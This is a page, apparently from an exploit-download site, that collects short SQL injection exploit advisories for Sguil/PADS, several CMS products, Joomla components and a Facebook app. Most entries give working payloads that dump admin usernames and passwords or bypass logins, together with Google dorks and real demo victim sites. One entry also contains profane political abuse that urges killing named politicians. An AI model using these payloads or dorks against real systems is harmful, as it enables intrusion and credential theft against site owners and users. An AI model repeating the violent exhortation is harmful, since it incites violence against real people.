Ataraxia/Sguil/PADS SQL Injection / Crash ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
| Sguil/PADS SQL injection and server crash exploitby Ataraxia (Benjamin Rose)Public announcement made 7/15/09.Please visit http://allmybase.com/ (my blog) for more up-to-dateinformation, and a quick patch.This exploit has the ability to render any Intrusion DetectionSystem utilizing the sguil monitoring useless. At the lowest level,you can kill the master logging daemon that collates the data intoa MySQL database. I've also been able to inject random and uselessdata into the MySQL database, which opens the door for an obfuscationof an attack, or a flat-out denial of service attack. There also existsthe possibility of dropping the database altogether, though I was notable to make this happen during my preliminary testing of the attack.The sguil sensor boxes report back to a sguil daemon on a management server,which in turn puts the data received into a MySQL database. The sensorcollects data from many sensor agents, the most popular ones including snortand sancp. Since snort is the de-facto standard NIDS, sguil is found in a lotof places where there are mission-critical NIDS, making this a potentvulnerability. The idea here is to craft a special packet containing a SQLstatement and send it across the wire, such that the sguil-agents will pick upon it. We will exploit the Passive Asset Detection System (PADS) -> sguilrelationship, which will be monitoring for said banner packets. Thanks to theavailability of the netcat program, there is also no need for any programmingskill. Also, the attack can run on any port, so even an unprivileged usercould porentially run this attack.Without further ado, here's the good stuff:TO CRASH THE SERVER:from a box that has its traffic monitored, runecho “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777...and then telnet to port 7777 from another box. There will be a syntaxerror in the sguil management daemon's SQL insert statement, and it willcrash rather ungracefully. This is highly noticable, so be careful!TO INJECT DATA SILENTLY:from a box that has its traffic monitored, runecho “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888...and then telnet to port 8888 from another box. The difference here is thesemicolon in the statement. This will insert an asset into the SQL database asssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-)PROOF OF CONCEPT:mysql> use sguildb;Reading table information for completion of table and column namesYou can turn off this feature to get a quicker startup with -ADatabase changedmysql> select * from pads where `hex_payload`=’deadbeefcafe’;+————–+—–+———-+———————+————+———+——+———-+————-+————–+| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload |+————–+—–+———-+———————+————+———+——+———-+————-+————–+| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe |+————–+—–+———-+———————+————+———+——+———-+————-+————–+1 row in set (0.01 sec) Note that you don't even need to put in legit hex into the attack for it to work. Bonus pointsif you put in a hexademical message to the sysadmin that doesn't even contain legit hex. |
Sguil/PADS suffers from remote SQL injection and crash vulnerabilities.
Farbod Mahini/CommonSense CMS Blind SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| ############################################################################# Exploit Title: CommonSense CMS script Blind SQL Injection Vulnerability# Google Dork: intext:"Powered by CommonSense CMS script"# Date: 6/1/2012# Author: H4ckCity Security Team# Discovered By: farbodmahini# Home: WwW.H4ckCity.Org # Version: All Version# Category:: webapps# Security Risk:: High# Tested on: GNU/Linux Ubuntu - Windows Server - win7############################################################################### Exploit:### [~] Blind SQL :## http://[target]/special.php?id=1 [Blind SQL]# http://[target]/article.php?id=5 [Blind SQL]# http://[target]/cat2.php?id=1 [Blind SQL]## Test MySQL time based injection.## # Demo:## http://womaninus.com/article.php?id=56 [Blind SQL]# http://womaninus.com/special.php?id=1 [Blind SQL]# http://womaninus.com/cat2.php?id=1 [Blind SQL]# ############################################################################## Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...############################################################################GreetZ : All H4ckCity Member - BHG Members - 1337day.com############################################################################ |
CommonSense CMS suffers from a remote blind SQL injection vulnerability.
X-Cisadane/CMS Balitbang 3.x SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| =========================================================================CMS Balitbang 3.x SQL Injection Vulnerability=========================================================================:-------------------------------------------------------------------------------------------------------------------------:: # Exploit Title : CMS Balitbang 3.x SQL Injection Vulnerability: # Date : 21 November 2011: # Author : X-Cisadane: # Software Link : http://www.kajianwebsite.org/html/index.php: # Version : 3.x: # Category : Web Applications: # Vulnerability : SQL Injection: # Tested On : Google Chrome 14.0.835 (Windows): # Dorks : inurl:alumni.php?id=data&tahun&hal= OR inurl:index.php?id=lih_buku&hal=: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane,Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari:-------------------------------------------------------------------------------------------------------------------------:POC :SQL Injection Vulnerability :- Open Victim Website : http://<site>/<CMS Balitbang InstallationPath>/alumni.php?id=data&tahun&hal='[SQL]- Open Victim Website : http://<site>/<CMS Balitbang InstallationPath>/index.php?id=lih_buku&hal='[SQL]- Open Victim Website : http://<site>/<CMS Balitbang InstallationPath>/index.php?id=artikel&hal='[SQL]- Open Victim Website : http://<site>/<CMS Balitbang InstallationPath>/index.php?id=album&hal='[SQL]- Open Victim Website : http://<site>/<CMS Balitbang InstallationPath>/index.php?id=berita&hal='[SQL]Example :-= Regards =-Dwi a.k.a X-Cisadane |
CMS Balitbang version 3.x suffers from a remote SQL injection vulnerability.
Sora/Drumbeat CMS 1.0 SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| # Vendor: http://www.drumbeatcms.com.au/# Version: Version 1.0# Tested on: Windows and Linux-----------------------------------------Drumbeat CMS SQL Injection Exploit[+] Discovered and notified by SoraA
SQL injection exploit is found in Drumbeat CMS. The vulnerability
exists in where there is an index.php page, such as index02.php?id=5. or
index03.php?id=2.Dork: "Powered by Drumbeat" inurl:index02.php# Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--You can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.Greetz: Bw0mp and the rest of the people from Incursio ex Subter!# EOF # |
Drumbeat CMS version 1.0 suffers from a remote SQL injection vulnerability.
learn3r/Public Media Manager Bypass / SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| ################################################## Public Media Manager SQLi vulns ## By learn3r hacker from Nepal ## damagicalhacker@gmail.com ##################################################Product name: Public Media ManagerThis product, an online NEWS CMS, suffers from SQL injection in login so that we can bypass the login system.Also, it suffers from SQLi in the GET variables which can be exploited to get different information from the database.################ SQL Login Bypass #################Admin panel located at: /newsdbUsername: validuser'# [eg. admin'#]Password: learn3r [or whatever]Username: ' or 1='1'#Password: learn3r [ or whatever]################ SQL Injections ##################[+] Exploit:http://localhost/pmm-cms/NewsCMS/newsdb/fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())Maybe there are more vulns but I can't give more time in auditing codes.Greetz
to: sToRm(Thanks a lot bro) and m0nkee from #gny, sam207 from
www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of NepalK!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar...We
need political stability and economic development in Nepal and you
motherfuckers are terrorizing in the name of political parties. So BIG
FUCK YOUs to all the political parties and leaders of Nepal.By learn3r aka cyb3r lordNepali Hackerz Are Not Dead!!! |
Public Media Manager suffers from bypass and remote SQL injection vulnerabilities.
Taurus Omar/InterPont Plus Kft SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
| 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 00 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 11 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 00 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 11 \ \____/ >> Exploit database separated by exploit 00 \/___/ type (local, remote, DoS, etc.) 11 10 [x] Official Website: http://www.1337day.com 01 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 10 01 ========================================== 10 I'm Taurus Omar Member From Inj3ct0r TEAM 11 ========================================== 00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1| || C _:_ A | InterPont Plus Kft - SQL Injection Vulnerability | C _:_ A |--------------------------------------------------------------------------==> ABOUT ME:--- TAURUS OMAR--- INDEPENDENT SECURITY RESEARCHER--- ACCESOILEGAL.BLOGSPOT.COM--- @omartaurus--- omar-taurus[at]dragonsecurity[dot]org --- omar-taurus[at]live[dot]com===> INFO:Author : TAURUS OMARCategory : Webapps / 0day Title Exploit : InterPont Plus Kft- SQL Injection Vulnerability Vendor : InterPont Plus KftURL Vendor : http://www.interpont.hu/Google Dork : intext:"Késztette: InterPont Plus Kft."0day exploits : 1337day.com Inj3ct0r Exploit DataBase ==> SAMPLE'S SQLi:http://www.piliscomp.com/~motorola/termekek.php?open=39&katid=&gyarto=4 [SQL Injection]http://www.custom-chrome.hu/termekek.php?open=23&katid=95 [SQL Injection]MORE IN GOOGLE..# 1337day.com [2012-06-22] |
InterPont Plus Kft suffers from a remote SQL injection vulnerability.
Fl0riX/Joomla KsAdvertiser SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ######################################################################### Joomla Component com_ksadvertiser SQL Injection Vulnerability ######################################################################## # Author :FL0RiX# # Name : com_ksadvertiser# # Bug Type : SQL Injection# # Infection : Admin login bilgileri alinabilir. # # Demo Vuln : ## http://tsv-lesse.de/index.php?option=com_ksadvertiser&pid=[EXPLOIT]&task=showcats ##EXPLOIT : null/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/jos_users--########################################################################_________________________________________________________________Yeni Windows 7: Gündelik iþlerinizi basitleþtirin. Size en uygun bilgisayarý bulun. |
The Joomla KsAdvertiser component suffers from a remote SQL injection vulnerability.
Sora/Left 4 Dead Stats SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ----------------------------------> Left 4 Dead Stats SQL Injection Vulnerability> Author: Sora> Contact: vhr95zw [at] hotmail [dot] com> Website: http://greyhathackers.wordpress.com/> Google Dork: "In your dreams, script kiddies."# VULNERABILITY DESCRIPTION:Left 4 Dead Stats suffers from a remote SQL injection vulnerability in player.php.# VULNERABILITY SOLUTION:The owner of the website can sanitize the database inputs.# Proof of Concept: http://www.site.com/l4dstats/player.php?steamid='# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, Revelation, and Max Mafiotu. |
Left 4 Dead Stats version 1.1 suffers from a remote SQL injection vulnerability.
SirGod/Limmy 1.01 SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| ###########################################################################################[+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability[+] Discovered By SirGod############################################################################################[+] Script Homepage : http://www.limny-project.com/[+] SQL Injection Vulnerability - Notes : magic_quotes_gpc = off - Vulnerable code in includes/functions.php--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------function CheckLogin($username, $password){ global $db; $query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."usersWHERE user='$username' AND pass='$password'"); if($check = $db->fetch_array($query)) { return true; }else{ return false; }}-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC Username : [REAL-ADMIN-NAME] ' or ' 1=1 Password : anything[REAL-ADMIN-NAME] = usually is admin############################################################################################ |
Limmy version 1.01 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
3spi0n/PhpBridges Blog System SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| # Exploit Title: PhpBridges Blog System SQL Injection Vulnerability# Date: 18/01/2012 - 04.19# Author: 3spi0n# Software Website: https://launchpad.net/phpbridges# Tested On: BackTrack 5 - Win7 Ultimate# Platform: Php>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>[$] Vulnerable File:[~] members.php[$] Demo Sites:[~] fantasticas.odisseias.net/members.php?id=2" [SQL Injection]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>># Dar bi Koridor Benimki, Kendimi Aradigim.>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>># Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- Mr.PaPaRoSSe And 3spi0n -Bug Researcher Group - TURKEY>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> |
PhpBridges Blog System suffers from a remote SQL injection vulnerability.
CoBRa_21/Webistry CMS 1.0 SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ################################################################################################# Exploit Title : Webistry v1.0 CMS SQL Injection Vulnerability## Author : CoBRa_21 ## E-Mail : uyku_cu [at] windowslive.com## Google Dork : Powered by CMS : Webistry v1.0## Script Page : null################################################################################################## Exploit## http://127.0.0.1/ [PATH] /index.php?pid=14' SQL## http://127.0.0.1/ [PATH] /index.php?pid=14 union select 0,1,2,3,version(),5,6,7#################################################################################################
|
Webistry CMS version 1.0 suffers from a remote SQL injection vulnerability.
p0pc0rn/Lasernet CMS 1.5 SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
| Title : LASERnet CMS Vulnerable to SQL InjectionVendor : http://lasernet.gr/cms.phpDork : intext:"Powered by Lasernet"Category: WebAppsDemo:?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
Lasernet CMS version 1.5 suffers from a remote SQL injection vulnerability.
Palyo34/DS CMS 1.0 SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| Script : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability Script site : http://cms.dsinternal.com/Home AUTHOR : Palyo34 HOME : http://www.1923turk.biz=======================================================+++++++++++++++++++++++ Exploit +++++++++++++++++++++++=======================================================exploit:-------Example:-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info-- |
DS CMS version 1.0 suffers from a remote SQL injection vulnerability.
longrifle0x/Facebook Fit-ify! SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
| Title:======Facebook Fit-ify! - SQL Injection VulnerabilityDate:=====2011-12-18References:===========VL-ID:=====337Introduction:=============The application is currently included and viewable by all facebook users.The service is an external 3rd party application sponsored by the Facebook Fit-ify! Development Team.(Copy from the Vendors Homepage: http://facebook.com/pages/I-may-be-gone-some-time/)Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook)Abstract:=========Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the 3rd party webapplication - Fit-ify! (apps.facebook.com).Report-Timeline:================2011-11-22: Vendor Notification2011-12-18: Public or Non-Public DisclosureStatus:========PublishedExploitation-Technique:=======================RemoteSeverity:=========HighDetails:========A SQL Injection vulnerability is detected on the Fit-ify! facebook application (apps.facebook).The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms.Vulnerable Module(s): [+] Fit-ify! - Facebook 3rd Party ApplicationVulnerable Param(s)/File(s): [+] 143596152351911?sk=app_8209307103Affected Application: [+] facebook.com/pages/I-may-be-gone-some-time/--- SQL Error Logs ---Warning:
mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource in /home/fitify/fitify.com/lib.php on line 196You haven\\\'t recorded any work-outs yet. Time to get outside and start exercising!Warning:
mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource in /home/fitify/fitify.com/lib.php on line 538Warning:
mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource in /home/fitify/fitify.com/lib.php on line 538Warning:
mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource in /home/fitify/fitify.com/lib.php on line 538Warning:
mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource in /home/fitify/fitify.com/lib.php on line 245Picture(s): ../1.pngProof of Concept:=================The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...URL: facebook.com/pagesPath: /I-may-be-gone-some-time/Request: 143596152351911?sk=app_8209307103Example:http://[FACEBOOK]/[PAGE]/[FILE]?[PARAM]=[ID]&[SQL Injection]PoC:http://www.facebook.com/pages/I-may-be-gone-some-time/143596152351911?sk=app_8209307103[SQL-Injection]Solution:=========Use the prepared statement class to fix the sql injection vulnerability & filter sql error requests.Set error(0) to prevent against information disclosure via exceptions or error reports.Risk:=====The security risk of the application sql injection vulnerabilities are estimated as high(+).Credits:========Vulnerability Laboratory Researcher - Ucha G. (longrifle0x)Disclaimer:===========The
information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some states
do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation may
not apply. Any modified copy or reproduction, including partially
usages, of this file requires authorization from Vulnerability-Lab.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab-- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.comContact: admin@vulnerability-lab.com or support@vulnerability-lab.com |
The third party Facebook Fit-ify! application suffers from a remote SQL injection vulnerability.
3spi0n/Web Net Marketing Design SQL Injection ( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| # Exploit Title: web net marketing Design SQL Injection Vulnerability# Date: 03/03/2012# Author: 3spi0n# Software Website: http://www.webnetmarketing.ltd.uk/# Tested On: BackTrack 5 - Win7 Ultimate# Platform: Php>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>[$] Vulnerable File:[~] news-detail.php[$] Demo ;www.glamorgancricket.com/news-detail.php?int_id=775' [MySQLi]>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>># Dar bi Koridor Benimki, Kendimi Aradigim.>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>># Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne# Greetz : Grayhatz.Co>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- Mr.PaPaRoSSe And 3spi0n -Bug Researcher Group - TURKEY>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> |
Web Net Marketing Design suffers from a remote SQL injection vulnerability.
exploitsdownload.com
Posts
0 Comments
Bagaimana Pendapat Anda ?